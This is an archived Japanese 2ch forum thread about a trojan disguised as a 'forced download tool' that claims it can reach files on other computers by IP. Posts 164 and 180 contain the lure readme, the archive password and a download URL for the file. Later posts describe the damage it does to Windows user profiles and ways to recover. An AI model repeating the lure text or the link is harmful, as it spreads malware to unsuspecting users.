強制ULツールはやっぱりあるんか

このエントリーをはてなブックマークに追加
162 :02/01/04 02:13 ID:VppAm8Ea
(;´Д`)もうだめぽ
163セリオ:02/01/04 02:18 ID:LT6Ipnhe
164りどみ:02/01/04 02:20 ID:yoyw9qnA

■■■■■■■■■■■■■■■■■■■■■■■■

Windows用

強制DLツール Ver 1.1

■■■■■■■■■■■■■■■■■■■■■■■■

IP を 知る事により、他のマシン
( 各種サーバ、他のパーソナルコンピュータ ) のファイルの
ダウンロードを支援するツール
MXと一緒に使うと便利。

個人用各種 ファイヤーウォールや
ルータ等を解析し、侵入路の発見が可能

※ Windows 2000
Windows XP
Unix サーバ

への 侵入テスト済み

※ 個人の責任において使用して下さい
くれぐれも 他のコンピュータの
データ改ざん等は、しないで下さい

■■■■■■■■■■■■■■■■■■■■■■■■


メインファイルは、パスワードにより保護されています

ヒント : TEST です(半角大文字)

※ パスワードが開いたら
好きなフォルダに、一旦ファイルを保存します


■■■■■■■■■■■■■■■■■■■■■■■■
165 :02/01/04 02:21 ID:yoyw9qnA
怖くてダブルクリックできません。
166_:02/01/04 02:33 ID:XbiWgQH7
>>165
ハゲシク同意
167_:02/01/04 02:34 ID:zGBEAunW
怖すぎ。正直これは実行できない。
readme怪しすぎます。

>>セリオ
なぜ実行する時にパスがいるの?
168 :02/01/04 02:37 ID:VppAm8Ea
>>167
その辺はまだ序の口。
後に出てくるip.exeを解凍してからが問題。
((;゚Д゚)ガクガクブルブル
169_:02/01/04 02:41 ID:gvs6jibE
勇者よ来たれ!
170 :02/01/04 02:41 ID:yoyw9qnA
スゲー!!勇者だ!そんなのでてくるの?
171 :02/01/04 02:41 ID:yoyw9qnA
半角にスレ立てた。向こうで誰か実行することを祈る。
172 :02/01/04 02:42 ID:VppAm8Ea
DOSアプリなんだもん・・・恐すぎるよ(;´Д`)
173 :02/01/04 02:48 ID:A92BIHRL
>>171
やっぱりここの厨房だったか、、、
くそスレ立てんなよ。
174セリオ:02/01/04 02:52 ID:LT6Ipnhe
このプログラムは友人のShinという人物が作りました。
あとは、各自の判断に任せます。
175 :02/01/04 02:55 ID:YMku5jd5
実行したよ。どうでもいいPCなんで。
でもエラーで出来なかった。
再起動したけど変化なし。
亜種のトロイだったりして。(゚д゚)マズー!
176 :02/01/04 02:56 ID:O+OOAst6
>>174
最強のMX撲滅ツールですね(w
177 :02/01/04 02:56 ID:VppAm8Ea
既に消えたもよう(;´Д`)
178 :02/01/04 02:59 ID:yoyw9qnA
トロイってことで決定?
179セリオ:02/01/04 03:00 ID:LT6Ipnhe
>>178
もう一度復活させました。
180セリオ:02/01/04 03:01 ID:LT6Ipnhe
http://yourpub.omosiro.com/source/001.zip
↑です、興味のある方はどうぞ
181 :02/01/04 03:04 ID:8RfPXZIJ
落としたけどかなりぁゃιぃ
182 :02/01/04 03:05 ID:HSbj0TQ0
原理説明できてないしな。
183_:02/01/04 03:05 ID:7zobi6iN
一瞬「解凍しています」と出ただけで何も出てこないYO!
184 :02/01/04 03:11 ID:HSbj0TQ0
なんかヘタにZIPも解凍したくないね。
DLL古いと危ない穴残ってたりするから。
コード実行できちゃうとか。
185_:02/01/04 03:14 ID:MvnilKWj
ログ読んでナットク
186 :02/01/04 03:32 ID:HSbj0TQ0
なんか低レベル相手にするのうざいんで
削除以来出しておきました。
187 :02/01/04 07:24 ID:UQL89sqe
真相解明age
で、なんだったの?結局。
188 :02/01/04 12:39 ID:li5OYfwR
試してやった。
189a:02/01/04 12:48 ID:nllkZN9a
56kと低速ケブラーのいるスレ
190 :02/01/04 12:51 ID:li5OYfwR
当方WIN2k

これを解凍すると、一つファイルがでてきます。解凍するだけでは
多分ウイルスには感染していないと思います。でてきたファイルは
htmlファイルだと思う。それを実行した瞬間画面に一瞬ウインドウが
現れ消える。その直後急激にメモリが奪われ操作がほとんど不可能になる。
再起動すると直ったかのように思われるが、先ほどログインしていた
ユーザーでまたログインすると、デスクトップ画面が表示できずほとんど止まってしまう。
かなり厄介なことになります。セーフモードでもそのアカウントでログインしても
メモリが奪われデスクトップは表示できません。でも直し方は一応あります。これは簡単。
そのユーザーアカウントを消去すればいいです。その後またアカウントを作成し直してください。

以上結果報告でした。でもアンチウイルスなどかけてないからわかんないけど、
トロイかもしらんね。でも目に見える被害はこれだけ。
191 :02/01/04 13:41 ID:Uus2aw5V
再アップ希望
192 :02/01/04 14:02 ID:RmWhsvAu
>>148

まだ生きてるぞ。不完全だが。
あと、NAVが「スクリプトの実行があるぞ」とか言ってるが無視してヨカータのか?
193 :02/01/04 14:17 ID:RmWhsvAu
あれを解凍(ip.exe化)してから急にシステムが重たくなったのだがおかしくないか?
194 :02/01/04 14:20 ID:UQL89sqe
半角にはaccsにメールが送信されるって書いてるぞ?
195192&193:02/01/04 15:52 ID:RmWhsvAu
ヤヴァイぞ。あれを起動したら、Exprorerを正常に動作させないスクリプトがインストールされる。
今違うPCでカキコしてるが、未だ解決できていない。誰かWinNTかWinXPでこの問題にあった
人で解決できた人がいたら、解決方法、情報を教えてくれないか?
196192&193:02/01/04 16:18 ID:RmWhsvAu
今WinのCDから上書きインストールしてるが、これでうまくいったらいいのだが・・・
制作者に一言言いたい。
>このプログラムは友人のShinという人物が作りました。
>あとは、各自の判断に任せます。
でもさ、動作確認とかするだろ?普通。何でそのときに気づかないんだ?
197 :02/01/04 16:23 ID:v8iFJQ2O
>>196
確信犯だから。
198192&193:02/01/04 16:25 ID:RmWhsvAu
まあ、そうだな。
くそ、あっちのPCならAA書けるのにー
やっぱ危険って事で。
199 :02/01/04 16:49 ID:HSbj0TQ0
>>198
なるつもりなく人柱になってしまったかもしれないけどご苦労様でした。
これで確実に悪質実行バイナリと決まりましたね。
200192&193:02/01/04 17:04 ID:RmWhsvAu
200ゲット
>>199
他のユーザのお役に立てて光栄だ。とか言いたいけどこれはきつい。
しかも上書きまだ終わってないし。はぁ〜シテオクー
201190:02/01/04 17:09 ID:gnGi1ZAg
>>200

ゲストユーザーでログインしてAdministratorのパスワードを
入力してその時引っかかったユーザーを消したら私は生き返りました。
がんばってください。
202192&193:02/01/04 17:32 ID:RmWhsvAu
ゲストユーザで・・・う〜む、エクスプローラ=コントロールパネルも出せないし・・・
窓の手を直で起動してみるか・・・確か、ゲストユーザーを出すレジストリキーがあったな、確か。
・・・確かばっかだな。
>201
サンクス、がんばってみるよ。
つーか >>190 に書いてあったね、全く同じ内容。スマソ
203192&193:02/01/04 17:56 ID:RmWhsvAu
やっとランチャー経由で違うアカウントを作成。
これでうまくいったらマンセーなんだけど。
204人柱君 ◆81gVrWR2 :02/01/04 18:00 ID:RmWhsvAu
久しく見てないRunaインターフェースだYO!
205感動した!:02/01/04 18:21 ID:Tnl7Q0MV
体を張った人柱マンセー!

復旧、がんばってください。
206人柱君 ◆81gVrWR2 :02/01/04 18:34 ID:RmWhsvAu
何とか復帰したが・・・・
ATOKは使えないし、スタートアップ(特にレジストリの部分)は消えるし、
一部ソフトは初期状態になるし・・・・
207175:02/01/04 19:31 ID:3isX202E
俺は書いたとおり、特に目に見える被害はないが…。
確かに起動したらフリーズしたけどね。
当方Me。
208押してみた:02/01/04 22:16 ID:4WOki4lL
当方WinXPアドミスターでログイン

NTUSER.DAT.LOG
NTUSER.DAT

を他のアカウントのと入れ替え復帰、
ユーザー毎の設定は多少犠牲になるな
MXはなんとも無かったよ
209Shin:02/01/05 00:16 ID:JJ28hjqp
う〜、それとまったく同じ奴がレンタル鯖にあるよ…

http://pc.2ch.net/test/read.cgi/perl/1004856497/l50

俺はまんまと引っ掛かった…
で、直し方だけど、当方はXPだったもので、取り敢えず、セーフモードで起動して別のアカウントでログインする。
で、Windowsフォルダ内にIPと言う怪しいファイルが出来ているから、それを消す。
んで、そのままログアウトで今まで使っていたユーザーでログオンする、でもかなり重いが根気よく続ける。
その後システムの復元をすれば殆ど元の状態に戻る。
210Shin:02/01/05 00:20 ID:JJ28hjqp
>>209
XPはセーフモードで起動するとシステムの修復をするか、起動をするか聞いてきます。
211Shin
>>210
更に補足、一日前くらいに復元すると、良いよ。
殆どもどるし、初期状態になるようなことは無いです。